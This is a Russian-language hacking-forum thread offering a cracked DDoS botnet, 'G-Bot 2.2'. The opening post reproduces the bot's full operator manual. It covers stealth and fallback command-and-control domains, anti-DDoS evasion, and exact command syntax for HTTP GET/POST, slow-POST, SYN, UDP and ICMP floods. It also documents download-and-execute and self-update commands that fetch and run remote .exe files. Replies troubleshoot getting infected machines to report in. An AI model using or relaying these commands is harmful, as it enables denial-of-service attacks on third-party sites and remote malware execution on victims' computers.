1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

G-Bot DDoS Bot 2.2

Тема в разделе "DDoS и DoS инструменты | Стрессеры", создана пользователем webster, 11 май 2012.

  1. TopicStarter Overlay
    webster

    webster Гость

    [​IMG]

    Скриншот билдера:

    [​IMG]

    Официальное описание:


    Код:
    Полное описание бота, всех его команд и особенностей.
    Последняя версия на данный момент 2.2 (На данный момент последняя версия 2.5)
    Особенности:[*] Небольшой стелс механизм[*] Вес бота [2.2] ~41кб без сжатия (зависит от длины доменов)[*] Мульти-задачность[*] Динамичная многопоточность[*] 3 домена (в случае блокировки 1ого - боты стучат на 2ой, в случае блокировки 2ого домена - боты стучат на 3ий)[*] Составление рандомных пакетов ботами[*] Возможность составить самому рандомный Post пакет[*] Возможность сделать переход бота по рандомным страницам, пример: vBulletin форум, http://forum.ru/forum/showthread.php?p=<<<INT(1;50000)INT>>>#post<<<INT( 1;50000)INT>>>
    в результате такой команды бот будет рандомно грузить темы и сообщения форума.
    ВНИМАНИЕ!!! Данная возможность обходит некоторые тупые антиддос.
    Бот поддерживает атаки такие как:[*] HTTP [Get,Post][*] SYN [Иначе атака на порт, оставляющая после себя полу-открытые порты][*] UDP [*] ICMP [Пинг]
    Каждый вид атаки имеет режимы, вот их описание:
    [1] Simple [.simplehttpflood] - простой режим, в этом режиме бот коннектится по таймауту,
    работает только для http флуда (.simplehttpflood )
    [2] A [.ahttpflood] - антиддос режим, в этом режиме бот пытается обойти антиддос по тайму, уменьшая как можно меньше нагрузки на сервер.
    [3] Post [.posthttpflood] - режим, в котором бот отсылает POST запросы на сайт.
    работает только для http флуда ( .posthttpflood )
    [4] Slow [.slowposthttpflood] - режим, в котором бот отсылает рандомные POST запросы разной длины и весом до 98.1кб.
    работает только для posthttp флуда ( .slowposthttpflood )
    С режимами вроде все.
    --------------------------------------------------------------------------
    Теперь команды:
    
    .download http://host.com/exe.exe;  Скачать -> запустить файл (только *.exe!)
    .update http://host.com/exe.exe;  Начать обновление бота [загрузка нового файла по ссылке, запуск и выход] (только *.exe!)
    Небольшое отступление:
    <<<INT(1;5)INT>>> - Рандомит число от 1 до 5
    <<<STR(10)STR>>> - Рандомит 10 символов
    Ссылка при HTTP/ICMP флуде должна быть до какой либо страницы, после | указывается кол-во потоков, исключение .simplehttpflood.
    ВАЖНО! В конце каждой команды должно стоять - ";".
    .httpflood http://host.com/forum/showthread.php?p=<<<INT(1;50000)INT>>>|10;  Начать Get HTTP флуд в обычном режиме рандомя при каждом запросе атакуемую тему (vBulletin)
    .simplehttpflood http://host.com/script.php|1000;  Начать Get HTTP флуд в "простом" режиме, с паузой в 1000ms
    .ahttpflood http://host.com/forum/showthread.php?p=<<<INT(1;50000)INT>>>|10;  Начать Get HTTP флуд в антиддос режиме, рандомя при каждом запросе атакуемую тему (vBullitin)
    .posthttpflood http://host.com/s.php?$login=<<<STR(8)STR>>>&password=<<<INT(10000 0;900000)INT>>>|10; Начать Post HTTP флуд в обычном режиме [после символа "$" - идет содержимое пакета, здесь оно следующее: login=<<<STR(8)STR>>>&password=<<<STR(8)STR>>> - передается как содержимое пакета "<<<STR(8)STR>>>" - заменится на 8 рандомных символов, также можно использовать "<<<INT(100000;900000)INT>>>" - заменяется на рандомное число от 100000 до 900000.]
    .slowposthttpflood http://host.com/s.php|10;  Начать Slow Post HTTP флуд в обычном режиме [Содержимое пакета составляется рандомно]
    .icmpflood http://host.com/script.php|10;  Начать ICMP флуд в обычном режиме
    .synflood 127.0.0.1:80|10;  Начать SYN флуд в обычном режиме
    .ontcpflood 127.0.0.1:80[$CONTENT $]|10;  Начать SYN флуд в обычном режиме между тегами [$ и $] нужно прописать содержимое пакета.
    .udpflood 127.0.0.1:80|10;  Начать UDP флуд в обычном режиме
    .stop 0;  Остановить выполнение команд
    
    Для одновременной атаки хоста HTTP[Get], HTTP[Post] и ICMP пишите команды через ; по команде на строчку
    Пример:
    .httpflood http://host.com/forum/showthread.php?p=<<<INT(1;50000)INT>>>|10;
    .posthttpflood http://host.com/s.php$login=<<<STR(8)STR>>>&password=<<<INT(100000 ;900000)INT>>>|10;
    .icmpflood http://host.com/|10;
    В результате такой команды боты создадут 3группы потоков,
    10 будут флудить get флудом по форуму (vBullitin),
    10 будут слать рандомные post пакеты на s.php,
    10 будут пинговать хост [ICMP].
    
    Автор: WestSide
    Реверсер: Apocalypse
    Заказчик: Stanislav


    >Please login or register to view links<
     
    • Like Like x 5
    Метки:
  2. Svik

    Svik

    Регистрация:
    31 май 2012
    Сообщения:
    293
    Симпатии:
    85
    Блин зачем флудить то?
     
    • Like Like x 1
  3. TopicStarter Overlay
    ckbel

    ckbel Гость

    в билдере ограничение на длину хоста в 12 символов.
     
    • Like Like x 1
  4. logan22

    logan22

    Регистрация:
    17 июл 2012
    Сообщения:
    40
    Симпатии:
    17
    ограничение то цветочки... Там отстук паршивый
     
    • Like Like x 1
  5. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    а что с отстуком? И как вообще вы писали данные в поля? Я не могу добится что бы отстук был... :(
     
  6. TopicStarter Overlay
    zikker

    zikker Гость

    Нормальный тут отстук!Лично проверял!
     
  7. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    У меня нет отстука, пол дня убил. Вроде всё банально но хер там...
     
  8. belix2008

    belix2008

    Регистрация:
    3 июн 2012
    Сообщения:
    24
    Симпатии:
    7
    Кривой реверс, используйте билдер от 1.7, а админку от 2.2
     

Поделиться этой страницей

Загрузка...